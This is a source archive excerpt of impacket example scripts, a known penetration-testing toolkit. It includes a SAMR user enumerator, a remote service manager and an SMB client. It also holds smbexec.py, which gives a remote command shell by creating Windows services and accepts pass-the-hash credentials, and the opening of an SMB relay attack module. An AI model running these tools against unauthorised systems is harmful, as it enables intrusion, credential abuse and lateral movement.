epm.RPC_C_EP_ALL_ELTS) dce.disconnect() return resp # Process command-line arguments. if __name__ == '__main__': print version.BANNER parser = argparse.ArgumentParser() parser.add_argument('target', action='store', help='[domain/][username[:password]@]
') parser.add_argument('protocol', choices=RPCDump.KNOWN_PROTOCOLS.keys(), nargs='?', default='135/TCP', help='transport protocol (default 135/TCP)') group = parser.add_argument_group('authentication') group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') if len(sys.argv)==1: parser.print_help() sys.exit(1) options = parser.parse_args() import re domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('') if domain is None: domain = '' dumper = RPCDump(options.protocol, username, password, domain, options.hashes) dumper.dump(address) impacket-0.9.10/examples/samrdump.py0000600000076500000240000001603012141750576017472 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: samrdump.py 592 2012-07-11 16:45:20Z bethus@gmail.com $ # # Description: DCE/RPC SAMR dumper. # # Author: # Javier Kohen # Alberto Solino # # Reference for: # DCE/RPC for SAMR import socket import string import sys import types from impacket import uuid, version from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr import argparse class ListUsersException(Exception): pass class SAMRDump: KNOWN_PROTOCOLS = { '139/SMB': (r'ncacn_np:%s[\pipe\samr]', 139), '445/SMB': (r'ncacn_np:%s[\pipe\samr]', 445), } def __init__(self, protocols = None, username = '', password = '', domain = '', hashes = None): if not protocols: protocols = SAMRDump.KNOWN_PROTOCOLS.keys() self.__username = username self.__password = password self.__domain = domain self.__protocols = [protocols] self.__lmhash = '' self.__nthash = '' if hashes is not None: self.__lmhash, self.__nthash = hashes.split(':') def dump(self, addr): """Dumps the list of users and shares registered present at addr. Addr is a valid host name or IP address. """ encoding = sys.getdefaultencoding() print 'Retrieving endpoint list from %s' % addr # Try all requested protocols until one works. entries = [] for protocol in self.__protocols: protodef = SAMRDump.KNOWN_PROTOCOLS[protocol] port = protodef[1] print "Trying protocol %s..." % protocol rpctransport = transport.SMBTransport(addr, port, r'\samr', self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) try: entries = self.__fetchList(rpctransport) except Exception, e: print 'Protocol failed: %s' % e raise else: # Got a response. No need for further iterations. break # Display results. for entry in entries: (username, uid, user) = entry base = "%s (%d)" % (username, uid) print base + '/Enabled:', ('false', 'true')[user.is_enabled()] print base + '/Last Logon:', user.get_logon_time() print base + '/Last Logoff:', user.get_logoff_time() print base + '/Kickoff:', user.get_kickoff_time() print base + '/Last PWD Set:', user.get_pwd_last_set() print base + '/PWD Can Change:', user.get_pwd_can_change() print base + '/PWD Must Change:', user.get_pwd_must_change() print base + '/Group id: %d' % user.get_group_id() print base + '/Bad pwd count: %d' % user.get_bad_pwd_count() print base + '/Logon count: %d' % user.get_logon_count() items = user.get_items() for i in samr.MSRPCUserInfo.ITEMS.keys(): name = items[samr.MSRPCUserInfo.ITEMS[i]].get_name() name = name.encode(encoding, 'replace') print base + '/' + i + ':', name if entries: num = len(entries) if 1 == num: print 'Received one entry.' else: print 'Received %d entries.' % num else: print 'No entries received.' def __fetchList(self, rpctransport): dce = dcerpc.DCERPC_v5(rpctransport) encoding = sys.getdefaultencoding() entries = [] dce.connect() dce.bind(samr.MSRPC_UUID_SAMR) rpcsamr = samr.DCERPCSamr(dce) try: resp = rpcsamr.connect() if resp.get_return_code() != 0: raise ListUsersException, 'Connect error' _context_handle = resp.get_context_handle() resp = rpcsamr.enumdomains(_context_handle) if resp.get_return_code() != 0: raise ListUsersException, 'EnumDomain error' domains = resp.get_domains().elements() print 'Found domain(s):' for i in range(0, resp.get_entries_num()): print " . %s" % domains[i].get_name() print "Looking up users in domain %s" % domains[0].get_name() resp = rpcsamr.lookupdomain(_context_handle, domains[0]) if resp.get_return_code() != 0: raise ListUsersException, 'LookupDomain error' resp = rpcsamr.opendomain(_context_handle, resp.get_domain_sid()) if resp.get_return_code() != 0: raise ListUsersException, 'OpenDomain error' domain_context_handle = resp.get_context_handle() resp = rpcsamr.enumusers(domain_context_handle) if resp.get_return_code() != 0 and resp.get_return_code() != 0x105: raise ListUsersException, 'OpenDomainUsers error' done = False while done is False: for user in resp.get_users().elements(): uname = user.get_name().encode(encoding, 'replace') uid = user.get_id() r = rpcsamr.openuser(domain_context_handle, uid) print "Found user: %s, uid = %d" % (uname, uid) if r.get_return_code() == 0: info = rpcsamr.queryuserinfo(r.get_context_handle()).get_user_info() entry = (uname, uid, info) entries.append(entry) c = rpcsamr.closerequest(r.get_context_handle()) # Do we have more users? if resp.get_return_code() == 0x105: resp = rpcsamr.enumusers(domain_context_handle, resp.get_resume_handle()) else: done = True except ListUsersException, e: print "Error listing users: %s" % e dce.disconnect() return entries # Process command-line arguments. if __name__ == '__main__': print version.BANNER parser = argparse.ArgumentParser() parser.add_argument('target', action='store', help='[domain/][username[:password]@]
') parser.add_argument('protocol', choices=SAMRDump.KNOWN_PROTOCOLS.keys(), nargs='?', default='445/SMB', help='transport protocol (default 445/SMB)') group = parser.add_argument_group('authentication') group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') if len(sys.argv)==1: parser.print_help() sys.exit(1) options = parser.parse_args() import re domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('') if domain is None: domain = '' dumper = SAMRDump(options.protocol, username, password, domain, options.hashes) dumper.dump(address) impacket-0.9.10/examples/services.py0000600000076500000240000002770412141750576017477 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: services.py 593 2012-07-11 16:48:20Z bethus@gmail.com $ # # SVCCTL services common functions for manipulating services # # Author: # Alberto Solino # # Reference for: # DCE/RPC. # TODO: # [ ] Check errors # [ ] Add Creating a Service import socket import string import sys import types import argparse #import hexdump from impacket import uuid, ntlm, version from impacket.dcerpc import dcerpc_v4, dcerpc, transport, svcctl class SVCCTL: KNOWN_PROTOCOLS = { '139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139), '445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445), '135/TCP': (r'ncacn_ip_tcp:%s', 135), '135/UDP': (r'ncadg_ip_udp:%s', 135), } def __init__(self, username, password, protocol, domain='', hashes=None, service_name=None, action=None, display_name = None, binary_path = None): if not protocol: protocol = SVCCTL.KNOWN_PROTOCOLS.keys() self.__username = username self.__password = password self.__protocol = [protocol] self.__service_name = service_name self.__display_name = display_name self.__binary_path = binary_path self.__action = action self.__domain = domain self.__lmhash = '' self.__nthash = '' if hashes is not None: self.__lmhash, self.__nthash = hashes.split(':') def run(self, addr): # Try all requested protocols until one works. for protocol in self.__protocol: protodef = SVCCTL.KNOWN_PROTOCOLS[protocol] port = protodef[1] print "Trying protocol %s..." % protocol stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username,self.__password, self.__domain, self.__lmhash, self.__nthash) try: self.doStuff(rpctransport) except Exception, e: print e else: # Got a response. No need for further iterations. break def doStuff(self, rpctransport): # UDP only works over DCE/RPC version 4. if isinstance(rpctransport, transport.UDPTransport): dce = dcerpc_v4.DCERPC_v4(rpctransport) else: dce = dcerpc.DCERPC_v5(rpctransport) #dce.set_credentials(self.__username, self.__password) dce.connect() #dce.set_max_fragment_size(1) #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY) #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_INTEGRITY) dce.bind(svcctl.MSRPC_UUID_SVCCTL) rpc = svcctl.DCERPCSvcCtl(dce) ans = rpc.OpenSCManagerW() scManagerHandle = ans['ContextHandle'] if self.__action.upper() != 'LIST' and self.__action.upper() != 'CREATE': ans = rpc.OpenServiceW(scManagerHandle, self.__service_name.encode('utf-16le')) serviceHandle = ans['ContextHandle'] if self.__action.upper() == 'START': print "Starting service %s" % self.__service_name rpc.StartServiceW(serviceHandle) rpc.CloseServiceHandle(serviceHandle) elif self.__action.upper() == 'STOP': print "Stopping service %s" % self.__service_name rpc.StopService(serviceHandle) rpc.CloseServiceHandle(serviceHandle) elif self.__action.upper() == 'DELETE': print "Deleting service %s" % self.__service_name rpc.DeleteService(serviceHandle) rpc.CloseServiceHandle(serviceHandle) elif self.__action.upper() == 'CONFIG': print "Querying service config for %s" % self.__service_name resp = rpc.QueryServiceConfigW(serviceHandle) print "TYPE : %2d - " % resp['QueryConfig']['ServiceType'], if resp['QueryConfig']['ServiceType'] & 0x1: print "SERVICE_KERNLE_DRIVER ", if resp['QueryConfig']['ServiceType'] & 0x2: print "SERVICE_FILE_SYSTEM_DRIVER ", if resp['QueryConfig']['ServiceType'] & 0x10: print "SERVICE_WIN32_OWN_PROCESS ", if resp['QueryConfig']['ServiceType'] & 0x20: print "SERVICE_WIN32_SHARE_PROCESS ", if resp['QueryConfig']['ServiceType'] & 0x100: print "SERVICE_INTERACTIVE_PROCESS ", print "" print "START_TYPE : %2d - " % resp['QueryConfig']['StartType'], if resp['QueryConfig']['StartType'] == 0x0: print "BOOT START" elif resp['QueryConfig']['StartType'] == 0x1: print "SYSTEM START" elif resp['QueryConfig']['StartType'] == 0x2: print "AUTO START" elif resp['QueryConfig']['StartType'] == 0x3: print "DEMAND START" elif resp['QueryConfig']['StartType'] == 0x4: print "DISABLED" else: print "UNKOWN" print "ERROR_CONTROL : %2d - " % resp['QueryConfig']['ErrorControl'], if resp['QueryConfig']['ErrorControl'] == 0x0: print "IGNORE" elif resp['QueryConfig']['ErrorControl'] == 0x1: print "NORMAL" elif resp['QueryConfig']['ErrorControl'] == 0x2: print "SEVERE" elif resp['QueryConfig']['ErrorControl'] == 0x3: print "CRITICAL" else: print "UNKOWN" print "BINARY_PATH_NAME : %s" % resp['QueryConfig']['BinaryPathName'].decode('utf-16le') print "LOAD_ORDER_GROUP : %s" % resp['QueryConfig']['LoadOrderGroup'].decode('utf-16le') print "TAG : %d" % resp['QueryConfig']['TagID'] print "DISPLAY_NAME : %s" % resp['QueryConfig']['DisplayName'].decode('utf-16le') print "DEPENDENCIES : %s" % resp['QueryConfig']['Dependencies'].decode('utf-16le').replace('/',' - ') print "SERVICE_START_NAME: %s" % resp['QueryConfig']['ServiceStartName'].decode('utf-16le') elif self.__action.upper() == 'STATUS': print "Querying status for %s" % self.__service_name resp = rpc.QueryServiceStatus(serviceHandle) print "%30s - " % (self.__service_name), state = resp['CurrentState'] if state == svcctl.SERVICE_CONTINUE_PENDING: print "CONTINUE PENDING" elif state == svcctl.SERVICE_PAUSE_PENDING: print "PAUSE PENDING" elif state == svcctl.SERVICE_PAUSED: print "PAUSED" elif state == svcctl.SERVICE_RUNNING: print "RUNNING" elif state == svcctl.SERVICE_START_PENDING: print "START PENDING" elif state == svcctl.SERVICE_STOP_PENDING: print "STOP PENDING" elif state == svcctl.SERVICE_STOPPED: print "STOPPED" else: print "UNKOWN" elif self.__action.upper() == 'LIST': print "Listing services available on target" #resp = rpc.EnumServicesStatusW(scManagerHandle, svcctl.SERVICE_WIN32_SHARE_PROCESS ) #resp = rpc.EnumServicesStatusW(scManagerHandle, svcctl.SERVICE_WIN32_OWN_PROCESS ) #resp = rpc.EnumServicesStatusW(scManagerHandle, serviceType = svcctl.SERVICE_FILE_SYSTEM_DRIVER, serviceState = svcctl.SERVICE_STATE_ALL ) resp = rpc.EnumServicesStatusW(scManagerHandle) for i in range(len(resp)): print "%30s - %70s - " % (resp[i]['ServiceName'].decode('utf-16'), resp[i]['DisplayName'].decode('utf-16')), state = resp[i]['CurrentState'] if state == svcctl.SERVICE_CONTINUE_PENDING: print "CONTINUE PENDING" elif state == svcctl.SERVICE_PAUSE_PENDING: print "PAUSE PENDING" elif state == svcctl.SERVICE_PAUSED: print "PAUSED" elif state == svcctl.SERVICE_RUNNING: print "RUNNING" elif state == svcctl.SERVICE_START_PENDING: print "START PENDING" elif state == svcctl.SERVICE_STOP_PENDING: print "STOP PENDING" elif state == svcctl.SERVICE_STOPPED: print "STOPPED" else: print "UNKOWN" print "Total Services: %d" % len(resp) elif self.__action.upper() == 'CREATE': resp = rpc.CreateServiceW(scManagerHandle,self.__service_name.encode('utf-16le'), self.__display_name.encode('utf-16le'), self.__binary_path.encode('utf-16le')) else: print "Unknown action %s" % self.__action rpc.CloseServiceHandle(scManagerHandle) dce.disconnect() return # Process command-line arguments. if __name__ == '__main__': print version.BANNER parser = argparse.ArgumentParser() parser.add_argument('target', action='store', help='[[domain/]username[:password]@]
') subparsers = parser.add_subparsers(help='actions', dest='action') # A start command start_parser = subparsers.add_parser('start', help='starts the service') start_parser.add_argument('-name', action='store', required=True, help='service name') # A stop command stop_parser = subparsers.add_parser('stop', help='stops the service') stop_parser.add_argument('-name', action='store', required=True, help='service name') # A delete command delete_parser = subparsers.add_parser('delete', help='deletes the service') delete_parser.add_argument('-name', action='store', required=True, help='service name') # A status command status_parser = subparsers.add_parser('status', help='returns service status') status_parser.add_argument('-name', action='store', required=True, help='service name') # A config command config_parser = subparsers.add_parser('config', help='returns service configuration') config_parser.add_argument('-name', action='store', required=True, help='service name') # A list command list_parser = subparsers.add_parser('list', help='list available services') # A create command create_parser = subparsers.add_parser('create', help='create a service') create_parser.add_argument('-name', action='store', required=True, help='service name') create_parser.add_argument('-display', action='store', required=True, help='display name') create_parser.add_argument('-path', action='store', required=True, help='binary path') parser.add_argument('protocol', choices=SVCCTL.KNOWN_PROTOCOLS.keys(), nargs='?', default='445/SMB', help='transport protocol (default 445/SMB)') group = parser.add_argument_group('authentication') group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') if len(sys.argv)==1: parser.print_help() sys.exit(1) options = parser.parse_args() import re domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('') try: service_name = options.name except: service_name = None if options.action.upper() == 'CREATE': display_name = options.display path = options.path else: display_name = None path = None if domain is None: domain = '' services = SVCCTL(username, password, options.protocol, domain, options.hashes, service_name , options.action.upper(), display_name, path) try: services.run(address) except Exception, e: print e impacket-0.9.10/examples/smbcat.py0000600000076500000240000000120312141750576017107 0ustar betostaff00000000000000import sys sys.path.append('..') from impacket import smb if len(sys.argv) < 4: print "Use: %s [user] [password]" % sys.argv[0] sys.exit(1) host = sys.argv[1] shre = sys.argv[2] file = sys.argv[3] user = '' passwd = '' try: user = sys.argv[4] passwd = sys.argv[5] except: pass s = smb.SMB('*SMBSERVER',host) s.login(user, passwd) tid = s.tree_connect_andx(r"\\*SMBSERVER\%s" % shre) fid = s.open_file(tid, file, smb.SMB_O_OPEN, smb.SMB_ACCESS_READ)[0] offset = 0 while 1: data = s.read_andx(tid, fid, offset, 40000) sys.stdout.write(data) if len(data) == 0: break offset += len(data) s.close_file(tid, fid) impacket-0.9.10/examples/smbclient.py0000600000076500000240000002013012141750576017616 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: smbclient.py 720 2012-10-03 19:05:34Z bethus@gmail.com $ # # Description: Mini shell using some of the SMB funcionality of the library # # Author: # Alberto Solino # # # Reference for: # SMB DCE/RPC # import sys import string from impacket import smb, version, smb3, nt_errors from impacket.dcerpc import dcerpc_v4, dcerpc, transport, srvsvc from impacket.nt_errors import * from impacket.smbconnection import * import argparse import ntpath import cmd import os class MiniImpacketShell(cmd.Cmd): def __init__(self): cmd.Cmd.__init__(self) self.prompt = '# ' self.smb = None self.tid = None self.intro = 'Type help for list of commands' self.pwd = '' self.share = None def emptyline(self): pass def onecmd(self,s): retVal = False try: retVal = cmd.Cmd.onecmd(self,s) except Exception, e: print "ERROR: %s" % e return retVal def do_exit(self,line): return True def do_shell(self, line): output = os.popen(line).read() print output self.last_output = output def do_help(self,line): print """ open {host,port,remote_name = '*SMBSERVER'} - opens a SMB connection against the target host/port login {username,passwd,domain} - logs into the current SMB connection, no parameters for NULL connection login_hash {username,lmhash,nthash} - logs into the current SMB connection using the password hashes logoff - logs off shares - list available shares use {sharename} - connect to an specific share cd {path} - changes the current directory to {path} pwd - shows current remote directory ls {wildcard} - lists all the files in the current directory rm {file} - removes the selected file mkdir {dirname} - creates the directory under the current path rmdir {dirname} - removes the directory under the current path put {filename} - uploads the filename into the current path get {filename} - downloads the filename from the current path info - Return NetrServerInfo main results close - closes the current SMB Session exit - terminates the server process (and this session) """ def do_open(self,line): l = line.split(' ') port = 445 if len(l) > 0: host = l[0] if len(l) > 1: port = l[1] if len(l) > 2: remote_name = l[2] else: remote_name = '*SMBSERVER' self.smb = SMBConnection(remote_name, host, sess_port=int(port)) dialect = self.smb.getDialect() if dialect == SMB_DIALECT: print "SMBv1 dialect used" elif dialect == SMB2_DIALECT_002: print "SMBv2.0 dialect used" elif dialect == SMB2_DIALECT_21: print "SMBv2.1 dialect used" else: print "SMBv3.0 dialect used" def do_login(self,line): l = line.split(' ') username = '' password = '' domain = '' if len(l) > 0: username = l[0] if len(l) > 1: password = l[1] if len(l) > 2: domain = l[2] self.smb.login(username, password, domain=domain) if self.smb.isGuestSession() > 0: print "GUEST Session Granted" else: print "USER Session Granted" def do_login_hash(self,line): l = line.split(' ') if len(l) > 0: username = l[0] if len(l) > 1: lmhash = l[1] if len(l) > 2: nthash = l[2] self.smb.login(username, '', lmhash=lmhash, nthash=nthash) if self.smb.isGuestSession() > 0: print "GUEST Session Granted" else: print "USER Session Granted" def do_logoff(self, line): self.smb.logoff() def do_info(self, line): rpctransport = transport.SMBTransport(self.smb.getServerName(), self.smb.getRemoteHost(), filename = r'\srvsvc', smb_connection = self.smb) dce = dcerpc.DCERPC_v5(rpctransport) dce.connect() dce.bind(srvsvc.MSRPC_UUID_SRVSVC) srv_svc = srvsvc.DCERPCSrvSvc(dce) resp = srv_svc.get_server_info_102(rpctransport.get_dip()) print "Version Major: %d" % resp['VersionMajor'] print "Version Minor: %d" % resp['VersionMinor'] print "Server Name: %s" % resp['Name'] print "Server Comment: %s" % resp['Comment'] print "Server UserPath: %s" % resp['UserPath'] print "Simultaneous Users: %d" % resp['Users'] def do_shares(self, line): resp = self.smb.listShares() for i in range(len(resp)): print resp[i]['NetName'].decode('utf-16') def do_use(self,line): self.share = line self.tid = self.smb.connectTree(line) self.pwd = '\\' def do_cd(self, line): p = string.replace(line,'/','\\') oldpwd = self.pwd if p[0] == '\\': self.pwd = line else: self.pwd = ntpath.join(self.pwd, line) self.pwd = ntpath.normpath(self.pwd) # Let's try to open the directory to see if it's valid try: fid = self.smb.openFile(self.tid, self.pwd) self.smb.closeFile(self.tid,fid) self.pwd = oldpwd except Exception, e: if (e.get_error_code() & 0xff) == (STATUS_FILE_IS_A_DIRECTORY & 0xff): pass else: self.pwd = oldpwd raise def do_pwd(self,line): print self.pwd def do_ls(self, wildcard): if wildcard == '': pwd = ntpath.join(self.pwd,'*') else: pwd = ntpath.join(self.pwd, wildcard) pwd = string.replace(pwd,'/','\\') pwd = ntpath.normpath(pwd) for f in self.smb.listPath(self.share, pwd): print "%s" % f.get_longname() def do_rm(self, filename): f = ntpath.join(self.pwd, filename) file = string.replace(f,'/','\\') self.smb.deleteFile(self.share, file) def do_mkdir(self, path): p = ntpath.join(self.pwd, path) pathname = string.replace(p,'/','\\') self.smb.createDirectory(self.share,pathname) def do_rmdir(self, path): p = ntpath.join(self.pwd, path) pathname = string.replace(p,'/','\\') self.smb.deleteDirectory(self.share, pathname) def do_put(self, pathname): params = pathname.split(' ') if len(params) > 1: src_path = params[0] dst_name = params[1] elif len(params) == 1: src_path = params[0] dst_name = os.path.basename(src_path) fh = open(pathname, 'rb') f = ntpath.join(self.pwd,dst_name) finalpath = string.replace(f,'/','\\') self.smb.putFile(self.share, finalpath, fh.read) fh.close() def do_get(self, filename): filename = string.replace(filename,'/','\\') fh = open(ntpath.basename(filename),'wb') pathname = ntpath.join(self.pwd,filename) try: self.smb.getFile(self.share, pathname, fh.write) except: fh.close() os.remove(filename) raise fh.close() def do_close(self, line): del(self.smb); def main(): print version.BANNER shell = MiniImpacketShell() if len(sys.argv)==1: shell.cmdloop() else: parser = argparse.ArgumentParser() parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell') options = parser.parse_args() print "Executing commands from %s" % options.file.name for line in options.file.readlines(): if line[0] != '#': print "# %s" % line, shell.onecmd(line) else: print line, if __name__ == "__main__": try: main() except: print "\n" pass impacket-0.9.10/examples/smbexec.py0000700000076500000240000002442412141750576017277 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003-2013 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: smbexec.py 742 2013-04-29 16:27:45Z bethus@gmail.com $ # # A similar approach to psexec w/o using RemComSvc. The technique is described here # http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access # Our implementation goes one step further, instantiating a local smbserver to receive the # output of the commands. This is useful in the situation where the target machine does NOT # have a writeable share available. # Keep in mind that, although this technique might help avoiding AVs, there are a lot of # event logs generated and you can't expect executing tasks that will last long since Windows # will kill the process since it's not responding as a Windows service. # Certainly not a stealthy way. # # This script works in two ways: # 1) share mode: you specify a share, and everything is done through that share. # 2) server mode: if for any reason there's no share available, this script will launch a local # SMB server, so the output of the commands executed are sent back by the target machine # into a locally shared folder. Keep in mind you would need root access to bind to port 445 # in the local machine. # # Author: # beto (bethus@gmail.com) # # Reference for: # DCE/RPC and SMB. import sys import os import cmd import argparse import random import string import time import ConfigParser from threading import Thread from impacket import version, smbserver from impacket.smbconnection import * from impacket.dcerpc import dcerpc_v4, dcerpc, transport, svcctl, srvsvc OUTPUT_FILENAME = '__output' BATCH_FILENAME = 'execute.bat' SMBSERVER_DIR = '__tmp' DUMMY_SHARE = 'TMP' class SMBServer(Thread): def __init__(self): Thread.__init__(self) def cleanup_server(self): print '[*] Cleaning up..' os.unlink(SMBSERVER_DIR + '/smb.log') os.rmdir(SMBSERVER_DIR) def run(self): # Here we write a mini config for the server smbConfig = ConfigParser.ConfigParser() smbConfig.add_section('global') smbConfig.set('global','server_name','server_name') smbConfig.set('global','server_os','UNIX') smbConfig.set('global','server_domain','WORKGROUP') smbConfig.set('global','log_file',SMBSERVER_DIR + '/smb.log') smbConfig.set('global','credentials_file','') # Let's add a dummy share smbConfig.add_section(DUMMY_SHARE) smbConfig.set(DUMMY_SHARE,'comment','') smbConfig.set(DUMMY_SHARE,'read only','no') smbConfig.set(DUMMY_SHARE,'share type','0') smbConfig.set(DUMMY_SHARE,'path',SMBSERVER_DIR) # IPC always needed smbConfig.add_section('IPC$') smbConfig.set('IPC$','comment','') smbConfig.set('IPC$','read only','yes') smbConfig.set('IPC$','share type','3') smbConfig.set('IPC$','path') self.smb = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig) print '[*] Creating tmp directory' try: os.mkdir(SMBSERVER_DIR) except Exception, e: print e pass print '[*] Setting up SMB Server' self.smb.processConfigFile() print '[*] Ready to listen...' try: self.smb.serve_forever() except: pass def stop(self): self.cleanup_server() self.smb.socket.close() self.smb.server_close() self._Thread__stop() class CMDEXEC: KNOWN_PROTOCOLS = { '139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139), '445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445), } def __init__(self, protocols = None, username = '', password = '', domain = '', hashes = None, mode = None, share = None): if not protocols: protocols = PSEXEC.KNOWN_PROTOCOLS.keys() self.__username = username self.__password = password self.__protocols = [protocols] self.__serviceName = 'BTOBTO'.encode('utf-16le') self.__domain = domain self.__lmhash = '' self.__nthash = '' self.__share = share self.__mode = mode if hashes is not None: self.__lmhash, self.__nthash = hashes.split(':') def run(self, addr): for protocol in self.__protocols: protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol] port = protodef[1] print "Trying protocol %s..." % protocol print "Creating service %s..." % self.__serviceName stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) if hasattr(rpctransport,'preferred_dialect'): rpctransport.preferred_dialect(SMB_DIALECT) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) try: if self.__mode == 'SERVER': serverThread = SMBServer() serverThread.daemon = True serverThread.start() self.shell = RemoteShell(self.__share, rpctransport, self.__mode) self.shell.cmdloop() if self.__mode == 'SERVER': serverThread.stop() except Exception, e: raise print e sys.stdout.flush() sys.exit(1) class RemoteShell(cmd.Cmd): def __init__(self, share, rpc, mode): cmd.Cmd.__init__(self) self.__share = share self.__mode = mode self.__output = '\\Windows\\Temp\\' + OUTPUT_FILENAME self.__batchFile = '%TEMP%\\' + BATCH_FILENAME self.__outputBuffer = '' self.__command = '' self.__shell = '%COMSPEC% /Q /c ' self.__serviceName = 'BTOBTO'.encode('utf-16le') self.intro = '[!] Launching semi-interactive shell - Careful what you execute' dce = dcerpc.DCERPC_v5(rpc) try: dce.connect() except Exception, e: print e sys.exit(1) s = rpc.get_smb_connection() # We don't wanna deal with timeouts from now on. s.setTimeout(100000) if mode == 'SERVER': myIPaddr = s.getSMBServer().get_socket().getsockname()[0] self.__copyBack = 'copy %s \\\\%s\\%s' % (self.__output, myIPaddr, DUMMY_SHARE) #self.__output = '\\\\%s\\%s\\%s' % (myIPaddr, DUMMY_SHARE, OUTPUT_FILENAME ) #self.__batchFile = '\\\\%s\\%s\\%s' % (myIPaddr, DUMMY_SHARE, BATCH_FILENAME ) dce.bind(svcctl.MSRPC_UUID_SVCCTL) self.rpcsvc = svcctl.DCERPCSvcCtl(dce) resp = self.rpcsvc.OpenSCManagerW() self.__scHandle = resp['ContextHandle'] self.transferClient = rpc.get_smb_connection() self.do_cd('') def do_shell(self, s): os.system(s) def do_exit(self, s): return True def emptyline(self): return False def do_cd(self, s): self.execute_remote('cd ' + s) if len(self.__outputBuffer) > 0: # Stripping CR/LF self.prompt = string.replace(self.__outputBuffer,'\r\n','') + '>' self.__outputBuffer = '' def do_CD(self, s): return self.do_cd(s) def default(self, line): if line != '': self.send_data(line) def get_output(self): def output_callback(data): self.__outputBuffer += data if self.__mode == 'SHARE': self.transferClient.getFile(self.__share, self.__output, output_callback) self.transferClient.deleteFile(self.__share, self.__output) else: fd = open(SMBSERVER_DIR + '/' + OUTPUT_FILENAME,'r') output_callback(fd.read()) fd.close() os.unlink(SMBSERVER_DIR + '/' + OUTPUT_FILENAME) def execute_remote(self, data): command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' > ' + self.__batchFile + ' & ' + self.__shell + self.__batchFile if self.__mode == 'SERVER': command += ' & ' + self.__copyBack command += ' & ' + 'del ' + self.__batchFile resp = self.rpcsvc.CreateServiceW(self.__scHandle, self.__serviceName, self.__serviceName, command.encode('utf-16le')) service = resp['ContextHandle'] try: self.rpcsvc.StartServiceW(service) except: pass self.rpcsvc.DeleteService(service) self.rpcsvc.CloseServiceHandle(service) self.get_output() def send_data(self, data): self.execute_remote(data) print self.__outputBuffer self.__outputBuffer = '' # Process command-line arguments. if __name__ == '__main__': print version.BANNER parser = argparse.ArgumentParser() parser.add_argument('target', action='store', help='[domain/][username[:password]@]
') parser.add_argument('command', action='store', help='command to execute at the target (w/o path)') parser.add_argument('-share', action='store', default = 'C$', help='share where the output will be grabbed from (default C$)') parser.add_argument('-mode', action='store', choices = {'SERVER','SHARE'}, default='SHARE', help='mode to use (default SHARE, SERVER needs root!)') parser.add_argument('protocol', choices=CMDEXEC.KNOWN_PROTOCOLS.keys(), nargs='?', default='445/SMB', help='transport protocol (default 445/SMB)') group = parser.add_argument_group('authentication') group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') if len(sys.argv)==1: parser.print_help() sys.exit(1) options = parser.parse_args() import re domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('') if domain is None: domain = '' executer = CMDEXEC(options.protocol, username, password, domain, options.hashes, options.mode, options.share) executer.run(address) sys.exit(0) impacket-0.9.10/examples/smbrelayx.py0000600000076500000240000007123212141750576017655 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2013 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: smbrelayx.py 754 2013-05-05 20:56:20Z bethus@gmail.com $ # # SMB Relay Module # # Author: # Alberto Solino # # Description: # This module performs the SMB Relay attacks originally discovered by cDc. It receives a # list of targets and for every connection received it will choose the next target and try to relay the # credentials. Also, if specified, it will first to try authenticate against the client connecting to us. # # It is implemented by invoking a SMB and HTTP Server, hooking to a few functions and then using the smbclient # portion. It is supposed to be working on any LM Compatibility level. The only way to stop this attack # is to enforce on the server SPN checks and or signing. # # If the authentication against the targets succeed, the client authentication success as well and # a valid connection is set against the local smbserver. It's up to the user to set up the local # smbserver functionality. One option is to set up shares with whatever files you want to the victim # thinks it's connected to a valid SMB server. All that is done through the smb.conf file or # programmatically. # import socket import string import sys import types import os import random import time import argparse import SimpleHTTPServer import SocketServer import base64 from impacket import smbserver, smb, ntlm, dcerpc, version from impacket.dcerpc import 